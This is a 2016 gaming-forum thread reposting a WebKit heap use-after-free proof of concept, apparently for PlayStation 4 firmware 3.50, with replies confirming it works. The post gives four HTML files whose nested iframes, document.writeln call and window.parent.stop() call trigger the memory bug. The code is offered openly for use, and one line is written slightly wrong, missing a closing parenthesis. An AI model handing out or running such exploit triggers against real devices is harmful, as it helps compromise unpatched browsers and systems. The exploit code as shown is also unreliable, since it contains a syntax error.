New Update: [RELEASE] heap use-after-free at WebCore - 3.50 Webkit Exploit POC by Hunter148

05-21-2016, 07:47 PM #1

Hydrogen

Super Mod

5,393

Posts

93,350

Reputation

6

Credits

Former Staff

Aug 2015

NextGenUpdate

(adsbygoogle = window.adsbygoogle || []).push({}); That moment you're waiting for it to be released, but Red got it first Sal

.. Credits to Hunter128 for releasing it publicly first, and credits to Red-EyeX32 for linking it on the ShoutBox. Here is the 3.50 Webkit PoC Release:

1.) Make an index.html

    <html>

  <body onload='runTest()'>

    <script>

      function runTest(){

       document.writeln('<html></html>';

      }

    </script>

  <iframe src='1.html'></iframe>

  </body>

</html>

HTML #1

    <html>

  <iframe src='2.html'></iframe>

  <iframe src='3.html'></iframe>

</html>

HTML #2

    <html>

  <script>

      window.parent.stop();

  </script>

</html>

HTML #3

    <html>

</html>

Cheers, Hydrogen

Luv ya Red Sal

Source: Wololo; Releaser: Hunter148

Last edited by Hydrogen ; 05-22-2016 at 03:54 AM.

The following 6 users say thank you to Hydrogen for this useful post:

CodJumper:, DMAAR-7777, Kronoaxis, mishary-1212, Yolo Brahs !

07-03-2016, 11:54 PM #29

ANONY420

NextGenUpdate Elite

230

Posts

1,461

Reputation

254

Credits

NextGenUpdate Elite

May 2014

NextGenUpdate

Originally posted by LilBoopie243

This is confirmed working on 3.50?

Yes confirmed working on 3.50

07-04-2016, 03:38 AM #30

LilBoopie243

Banned

35

Posts

32

Reputation

60

Credits

Banned

Jul 2016

NextGenUpdate

Originally posted by JDM

Yes confirmed working on 3.50

Okay thanks!